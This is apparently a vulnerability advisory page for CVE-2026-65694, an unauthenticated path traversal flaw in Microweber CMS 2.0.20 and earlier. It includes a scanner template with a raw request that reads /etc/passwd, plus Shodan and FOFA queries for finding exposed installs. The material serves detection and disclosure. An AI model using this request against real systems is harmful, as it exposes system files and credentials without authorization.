CVE-2026-65694: Microweber CMS <= 2.0.20 - Unauthenticated Arbitrary File Read

2026-07-31 Microweber CMS PoC Public

Description

Microweber CMS <= 2.0.20 contains a path traversal vulnerability caused by failure to normalize path query parameter in static file controller, letting unauthenticated remote attackers read arbitrary files.

PoC

id: CVE-2026-65694

info:
  name: Microweber CMS <= 2.0.20 - Unauthenticated Arbitrary File Read
  author: 0x_Akoko,abdugafforov-bobur
  severity: high
  description: |
    Microweber CMS <= 2.0.20 contains a path traversal vulnerability caused by failure to normalize path query parameter in static file controller, letting unauthenticated remote attackers read arbitrary files.
  impact: |
    Unauthenticated attackers can read sensitive files, potentially exposing credentials and system information.
  remediation: |
    Update to the latest version beyond 2.0.20.
  reference:
    - https://github.com/abdugafforov-bobur/CVE-2026-65694-PoC
    - https://nvd.nist.gov/vuln/detail/CVE-2026-65694
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-65694
    epss-score: 0.03394
    epss-percentile: 0.88209
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: microweber
    product: microweber
    shodan-query: http.html:"microweber"
    fofa-query: body="microweber"
  tags: cve,cve2026,microweber,lfi

http:
  - raw:
      - |
        GET /userfiles/x?path=../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "root:x:0:0")'
        condition: and
# digest: 4a0a0047304502210086b27fc3ebde4ddd29a5437f72d8167d75a4b184bf46680ee8dcf6ebd296d6f3022073defff90feee870cd437310291710eee0cfca84fa9d07ccded14b36bbf8308c:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities